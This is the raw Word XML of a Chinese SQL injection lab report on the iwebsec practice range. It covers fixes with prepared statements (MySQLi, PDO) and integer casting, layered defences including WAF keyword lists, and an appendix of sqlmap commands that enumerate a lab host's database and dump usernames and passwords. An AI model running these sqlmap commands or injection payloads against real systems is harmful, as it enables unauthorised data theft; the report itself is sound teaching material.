        <w:t>4.2.1 修复后安全代码（MySQLi扩展）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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230010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CF60FF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1. 定义数据库连接（省略连接代码，保持原有连接逻辑）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$conn = mysqli_connect("localhost", "root", "", "iwebsec");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2. 定义SQL模板，使用?作为占位符，彻底分离SQL指令与数据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无论用户输入什么，?位置仅被视为数据，不会被解析为SQL指令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$sql = "SELECT * FROM users WHERE id = ?";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3. 预处理SQL语句，编译SQL模板，防止注入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$stmt = mysqli_prepare($conn, $sql);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4. 绑定参数："i"表示参数类型为整数，将用户输入绑定到占位符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即使攻击者传入恶意字符串，也会被强制转换为整数，截断恶意代码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$id = $_GET['id'];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mysqli_stmt_bind_param($stmt, "i", $id);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5. 执行预处理后的SQL语句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mysqli_stmt_execute($stmt);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6. 获取查询结果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$result = mysqli_stmt_get_result($stmt);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7. 原有业务逻辑保持不变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($row = mysqli_fetch_assoc($result))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"welcome to iwebsec!!!";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8. 释放资源、关闭连接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mysqli_stmt_close($stmt);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mysqli_close($conn);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0785CF69">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.2.2 修复原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="23DD183D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预处理语句将SQL模板与数据分离，数据库先编译SQL模板，再将用户输入作为数据传入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB0801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无论用户输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1 AND 1=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1 UNION SELECT...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，都会被强制转换为整数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，恶意代码被截断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3084F98E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是OWASP推荐的SQL注入防御标准方案，适用于所有生产环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A16B6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1657964">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4.3 方案二：强制类型转换+白名单校验 —— 教学场景简易方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="7255D745">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.3.1 修复后安全代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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BF3C39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CC5D2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1. 获取用户输入，强制转换为整数（数字型ID专用）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恶意字符串如"1 AND 1=2"会被强制转换为整数1，截断恶意代码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$id = (int)$_GET['id']; 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2. 白名单校验：限定合法ID范围，拦截非法请求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$allowed_ids = [1, 2, 3, 4, 5];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(!in_array($id, $allowed_ids))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die("非法请求：参数ID不合法");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3. 此时再拼接SQL是安全的，$id已被强制转换为整数，无注入风险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$sql = "SELECT * FROM users WHERE id = $id";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$result = mysqli_query($conn, $sql);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($row = mysqli_fetch_assoc($result))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"welcome to iwebsec!!!";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mysqli_close($conn);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23D7F029">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.3.2 适用场景</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="5478925D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仅适用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数字型参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（如ID），不适用于字符串型参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6101E4E8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适合教学场景快速演示，生产环境仍推荐使用预处理语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A71E5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74573B24">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4.4 方案三：PDO预处理（通用方案，跨数据库兼容）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="688E531B">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.4.1 修复后安全代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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E0A416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FA8EF8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1. PDO数据库连接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$dsn = "mysql:host=localhost;dbname=iwebsec;charset=utf8";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$username = "root";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$password = "";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$conn = new PDO($dsn, $username, $password);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2. 定义SQL模板，使用:id作为命名占位符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$sql = "SELECT * FROM users WHERE id = :id";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3. 预处理SQL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$stmt = $conn-&gt;prepare($sql);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4. 绑定参数并执行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$id = $_GET['id'];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$stmt-&gt;bindParam(':id', $id, PDO::PARAM_INT);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$stmt-&gt;execute();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5. 获取结果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($row = $stmt-&gt;fetch(PDO::FETCH_ASSOC))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"welcome to iwebsec!!!";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6. 关闭连接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$conn = null;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6358D70D">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.4.2 优势</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="1AE8F2A1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跨数据库兼容，支持MySQL、PostgreSQL、SQL Server等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CBDE3B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代码更简洁，是PHP开发的主流方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505BB9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53CFB5F">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>五、防御加固补充措施（多层防御）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="4C13B654">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="heading_26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5.1 输入校验层</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="7FABAA38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对所有用户输入做严格校验：数字型参数强制类型转换，字符串型参数做长度、字符集校验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09209DBB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采用白名单机制，仅允许合法字符输入，拦截特殊字符（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>'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AND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UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB869C6">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="heading_27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5.2 数据库权限层</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="138490E4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遵循最小权限原则：Web应用使用的数据库用户仅分配必要权限，禁止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>FILE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DROP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ALTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等高危权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5703BE2F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禁止Web应用用户访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>INFORMATION_SCHEMA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>系统表，阻断盲注猜解路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16158476">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="heading_28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5.3 WAF防护层</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="7806B254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部署Web应用防火墙（WAF），拦截SQL注入攻击特征（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AND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UNION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SUBSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等关键字）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495198EF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对异常请求（如大量猜解请求）做限流、封禁处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4639DC89">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="heading_29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5.4 代码审计层</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="280CF433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定期进行代码审计，排查SQL拼接、输入未校验等漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541EE2AC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采用静态代码分析工具，自动化检测SQL注入风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9C9FC2">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="heading_33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>六</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>、附录：自动化注入工具（sqlmap）命令参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="075B5523">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="heading_34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7.1 检测注入点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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F8AD0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9E82AB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sqlmap -u "http://192.168.203.135/sqli/03.php?id=1"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B5E8128">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="heading_35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>.2 获取当前数据库名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31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9EB007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703CD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sqlmap -u "http://192.168.203.135/sqli/03.php?id=1" --current-db</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44665ED2">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="heading_36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>.3 获取指定数据库的表名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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16C0C1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4730C6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sqlmap -u "http://192.168.203.135/sqli/03.php?id=1" -D iwebsec --tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C43A843">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="heading_37"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>.4 获取指定表的字段名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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163F6E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8EB6F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sqlmap -u "http://192.168.203.135/sqli/03.php?id=1" -D iwebsec -T users --columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22B9A465">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="heading_38"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>.5 获取指定表的所有数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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F9F861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DE701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sqlmap -u "http://192.168.203.135/sqli/03.php?id=1" -D iwebsec -T users -C id,username,password --dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39927310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A337E3E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="35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6BE8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F0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6F57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2753</Words>
  <Characters>4892</Characters>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5219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2026-04-07T03:31:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>萧泽亮</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-07T03:33:48Z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CF9DC28EE819431C9A921FA4291EF8BB_13</vt:lpwstr>
  </property>
</Properties>
</file>